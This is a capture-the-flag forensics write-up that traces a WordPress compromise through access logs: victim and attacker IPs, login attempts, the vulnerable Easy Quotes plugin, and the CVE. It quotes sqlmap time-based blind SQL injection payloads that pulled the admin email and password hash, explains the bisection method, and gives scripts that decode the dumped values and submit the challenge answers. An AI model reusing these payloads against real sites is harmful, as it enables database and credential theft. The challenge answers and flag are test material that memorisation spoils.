Writeup Aria
C2C Qualification - English - Forensics

Log


Description

Author: daffainfo

My website has been hacked. Please help me answer the provided questions using the available logs!

Attachments

unzip log_log-dist.zip
# Archive:  log_log-dist.zip
#   inflating: dist-log.zip

unzip dist-log.zip
# Archive:  dist-log.zip
#   inflating: error.log
#   inflating: access.log

Connect to Netcat Challenge

To view the questions and attempt the answers, connect to the challenge server using netcat with the provided port.

nc challenges.1pc.tf <port>


Since there are multiple questions, we can answer them all at once by piping newline-separated (\n) input from echo into netcat, as shown below:

echo -e "182.8.97.244\njawabanno2" | nc challenges.1pc.tf 24868


This helps automate the process of sending answers to the challenge server, especially if there are many questions that must be answered. By using echo -e and \n, we ensure that each answer is sent on a new line, matching the format expected by the challenge server.

Analysis

1. What is the Victim's IP address?

Required Format: 127.0.0.1

Solution

Use the following command to extract all IP addresses from the log files and sort them uniquely:

grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | sort -u

Output:

access.log:1.10.1.21
access.log:127.0.0.1
access.log:165.22.125.147
access.log:182.8.97.244
access.log:219.75.27.16
error.log:165.22.125.147
error.log:172.18.0.1
error.log:172.18.0.3

Since there are only a handful of candidate IPs, we can simply submit each one to the challenge server until it is accepted:

grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | cut -d: -f2 | sort -u

# brute force ip: submit each candidate IP to the challenge instance until one is accepted
HOST=challenges.1pc.tf
PORT=<port>   # port of your challenge instance
grep -hEo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | sort -u | while read -r IP
do
    RESULT=$(printf "%s\n" "$IP" | nc -w 1 "$HOST" "$PORT")
    if echo "$RESULT" | grep -q "Status: Correct"; then
        echo "[+] FOUND Victim IP: $IP"
        break
    else
        echo "[-] Wrong: $IP"
    fi
done


182.8.97.244

2. What is the Attacker's IP address?

Required Format: 127.0.0.1

Solution

Manual inspection with cat works, but goaccess gives a much better overview of the access log, including which client IPs made the most requests.

Install goaccess:

sudo apt install goaccess

Use goaccess to analyze the log file and display statistics, including the most frequent IP addresses:

goaccess access.log --log-format=COMBINED
goaccess access.log --log-format=COMBINED -o report.html


219.75.27.16

3. How many login attempts were made by the attacker?

Required Format: 1337

Solution

We grep for POST requests to the login page in the log files.

grep -i "login" *.log  | grep -i post

# However, after checking again, we also need to filter for status code 200 because there may be some failed login attempts or just redirects.
grep -i "login" *.log  | grep -i post | grep 200
grep -i "login" *.log  | grep -i post | grep 200 | wc -l

Output:

6


4. Which plugin was affected (Full Name)?

Required Format: -

Solution

The requests to /wp-login.php seen earlier show that the site runs WordPress, so we grep for wp-content/plugins to see which plugins the attacker accessed. sed strips the timestamp and other unnecessary prefix information, and sort/uniq reduces the output to a list of unique plugin paths.

grep -h "wp-content/plugins" *.log | sed 's/\[.*\] //' | sort -u


However, when I tried answering with easy-quotes and easy quotes, the answer was incorrect. So I searched on Google and found the correct plugin name.


Easy Quotes


5. What is the CVE ID?

Required Format: CVE-XXXX-XXXX

Solution

We can search for the CVE ID related to the Easy Quotes plugin that we found earlier. We try searching on the website https://wpscan.com/plugins/ because it has a fairly complete database of WordPress plugin CVEs.

Finally, I found the CVE on the following page: https://wpscan.com/plugins/?page=12&get=e


CVE-2025-26943


6. Which tool and version were used to exploit the CVE?

Required Format: tool_name/13.3.7

Solution

Since we know that the CVE is CVE-2025-26943, which is a SQL injection vulnerability, we check whether the logs contain traces of common tools such as wpscan or sqlmap (their default User-Agent strings include the tool name and version).

grep -h "wpscan" *.log | sed 's/\[.*\] //' | sort -u
grep -h "sqlmap" *.log | sed 's/\[.*\] //' | sort -u


sqlmap/1.10.1.21


7. What is the email address obtained by the attacker?

Required Format: r00t@localhost.xyz

Solution

Since we know that the attacker used sqlmap to exploit the CVE, it is very likely that they successfully retrieved an email address from the database. Therefore, we try to grep user_email.

grep "user_email" access.log

Output:

219.75.27.16 - - [11/Jan/2026:13:02:18 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E64%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:19 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E96%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E112%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E104%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E100%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E98%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"

From the access log, it can be seen that the attacker used sqlmap time-based blind SQL injection (the SLEEP(...) wrapped in IF(...)) to extract the user_email value from the wordpress.wp_users table.

Example payload found in the log:

SELECT IFNULL(CAST(user_email AS NCHAR),0x20)
FROM wordpress.wp_users
ORDER BY ID LIMIT 0,1

sqlmap then wrapped that query in the following comparison:

ORD(MID(..., position, 1)) > value

This guesses each character one at a time from its ASCII value, narrowing the range with every request (a binary search). The relevant parts from the log:

... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>64 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>96 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>112 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>104 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>100 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>98 ...

These threshold values correspond to the following ASCII characters:

64  = @
96  = `
112 = p
104 = h
100 = d
98  = b

sqlmap narrows each character down with these > comparisons and then sends one confirmation request comparing the character with != (URL-encoded as %21%3D). Extracting the number from each of those confirmation requests and converting it back to a character gives the email string:

grep "user_email" access.log | \
sed -E 's/.*%21%3D([0-9]+).*/\1/' | \
grep -E '^[0-9]+$' | \
awk '{printf "%c",$1}'

Output: admin@daffainfo.com


admin@daffainfo.com

8. What is the password hash obtained by the attacker?

Required Format: -

Solution

We perform the same method as before, but this time we search for user_pass because password hashes are usually stored in that field in the WordPress database.

grep "user_pass" access.log | \
sed -E 's/.*%21%3D([0-9]+).*/\1/' | \
grep -E '^[0-9]+$' | \
awk '{printf "%c",$1}'


Output: $wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW

$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW
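As an added example (not the author's code), the following Python script does for questions 7 and 8 what the sed/awk pipeline does by hand: it URL-decodes each sqlmap request, pulls out the column, character position, comparison operator and value, and rebuilds the dumped string from the != confirmation requests (the %21%3D the sed command keys on). The log lines are constructed from the request shape shown above and are not the challenge's real access.log.

```python
import re
from urllib.parse import quote, unquote

# URL-encoded request path copied from the page's access.log, with the column, character
# position and comparison left as placeholders (used to build constructed sample lines).
TEMPLATE = ('/wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-'
            '%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28{col}%20AS%20NCHAR%29%2C0x20%29%20FROM%20'
            'wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C{pos}%2C1%29%29{cmp}%2C0%2C1%29'
            '%29%29%29%29txje%29--%20ugUY')

def probe_line(col, pos, op, val):
    """Constructed access-log line in the shape of the attacker's sqlmap requests (not the real log)."""
    path = TEMPLATE.format(col=col, pos=pos, cmp=quote(f"{op}{val}"))  # '>' -> %3E, '!=' -> %21%3D
    return (f'219.75.27.16 - - [11/Jan/2026:13:02:18 +0000] "GET {path} HTTP/1.1" 200 724 '
            f'"http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"')

# Decoded form of one probe: ORD(MID((SELECT IFNULL(CAST(<col> AS NCHAR),0x20) FROM <table> ...),<pos>,1)) <op> <val>
PROBE = re.compile(r"ORD\(MID\(\(SELECT IFNULL\(CAST\((?P<col>\w+) AS NCHAR\),0x20\) FROM [\w.]+"
                   r" ORDER BY ID LIMIT 0,1\),(?P<pos>\d+),1\)\)(?P<op>>|!=)(?P<val>\d+)")

def parse_probe(line):
    """Return (column, position, operator, value) for a sqlmap probe line, or None for other traffic."""
    m = re.search(r'"GET (\S+) HTTP', line)
    p = PROBE.search(unquote(m.group(1))) if m else None  # undo sqlmap's URL encoding first
    return (p["col"], int(p["pos"]), p["op"], int(p["val"])) if p else None

def reconstruct(lines):
    """Rebuild each dumped column from its '!=' confirmation probes; '>' probes are only bisection steps."""
    chars, probes = {}, {}
    for line in lines:
        parsed = parse_probe(line)
        if parsed is None:
            continue  # ordinary traffic, e.g. the wp-login.php POSTs
        col, pos, op, val = parsed
        probes[col] = probes.get(col, 0) + 1
        if op == "!=":
            chars.setdefault(col, {})[pos] = chr(val)
    return {col: "".join(c[i] for i in sorted(c)) for col, c in chars.items()}, probes

# Constructed sample: the page's six '>' thresholds for position 1, a '!=' confirmation per
# character of the dumped email, and one unrelated login request that must be ignored.
SAMPLE_LOG = [probe_line("user_email", 1, ">", v) for v in (64, 96, 112, 104, 100, 98)]
SAMPLE_LOG += [probe_line("user_email", i + 1, "!=", ord(ch)) for i, ch in enumerate("admin@daffainfo.com")]
SAMPLE_LOG.append('182.8.97.244 - - [11/Jan/2026:12:25:33 +0000] "POST /wp-login.php HTTP/1.1" 302 1275 "-" "Mozilla/5.0"')

if __name__ == "__main__":
    values, counts = reconstruct(SAMPLE_LOG)
    for col, value in values.items():
        print(f"{col}: {value} (recovered from {counts[col]} probes)")
```

Run against the real access.log by replacing SAMPLE_LOG with the file's lines; user_pass is picked up by the same regex because the column name is captured, not hard-coded.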

9. When did the attacker successfully log in?

Required Format: DD/MM/YYYY HH:MM:SS

Solution

We grep for requests to wp-login.php with status code 302 (WordPress redirects to the dashboard after a successful login) to find the timestamp of the successful login; the line from the attacker's IP (219.75.27.16) gives the answer.

grep "wp-login.php" access.log | grep " 302"

Output:

182.8.97.244 - - [11/Jan/2026:12:25:33 +0000] "POST /wp-login.php HTTP/1.1" 302 1275 "http://165.22.125.147/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.56 Safari/537.36"
219.75.27.16 - - [11/Jan/2026:13:12:49 +0000] "POST /wp-login.php HTTP/1.1" 302 1275 "http://165.22.125.147/wp-login.php?redirect_to=http%3A%2F%2F165.22.125.147%2Fwp-admin%2F&reauth=1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.56 Safari/537.36"


11/01/2026 13:12:49

Answer Questions

answers = [
    "182.8.97.244",
    "219.75.27.16",
    "6",
    "Easy Quotes",
    "CVE-2025-26943",
    "sqlmap/1.10.1.21",
    "admin@daffainfo.com",
    "$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW",
    "11/01/2026 13:12:49"
]
for answer in answers:
    print(answer)

HOST=challenges.1pc.tf
PORT=47693

echo -e "182.8.97.244\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\n" | nc $HOST $PORT

# Because the password hash contains the special character `$`, we need to escape it with `\` or use single quotes so the shell does not interpret it.
# However, when I tried that it kept failing, so as an alternative I used printf, which is more flexible for sending strings with special characters without worrying about escaping.
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n" | nc $HOST $PORT
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n%s\n" '$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW' | nc $HOST $PORT
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n%s\n11/01/2026 13:12:49\n" '$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW' | nc $HOST $PORT


Another alternative is to use Python:

import socket
import sys

if len(sys.argv) != 3:
    print(f"Usage: {sys.argv[0]} HOST PORT")
    sys.exit(1)

HOST = sys.argv[1]
PORT = int(sys.argv[2])

s = socket.socket()
s.connect((HOST, PORT))

def recv_until(target):
    # Read byte by byte until the prompt appears or the server closes the connection
    data = ""
    while target not in data:
        chunk = s.recv(1).decode()
        if not chunk:
            break
        data += chunk
    print(data, end="")
    return data

def send(msg):
    s.sendall((msg + "\n").encode())

# Answers that are already known to be correct
answers = [
    "182.8.97.244",
    "219.75.27.16",
    "6",
    "Easy Quotes",
    "CVE-2025-26943",
    "sqlmap/1.10.1.21",
    "admin@daffainfo.com",
    "$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW",
    "11/01/2026 13:12:49"
]

# Submit the known answers automatically
for ans in answers:
    recv_until("Your Answer:")
    send(ans)

# Switch to interactive mode for new questions (Q3 and onward)
while True:
    # Read until a prompt appears; stop when the server closes the connection
    data = ""
    while True:
        chunk = s.recv(4096).decode()
        if not chunk:
            sys.exit(0)
        data += chunk
        print(chunk, end="")
        if ":" in data:  # any prompt ending in ':' (covers "Your Answer:")
            break

    # Read the answer from the user and send it
    user_input = input(">> ")
    send(user_input)

python3 nc_quiz.py $HOST $PORT


Flag

C2C{7H15_15_V3rY_345Y_3a4d4f3b57c1}
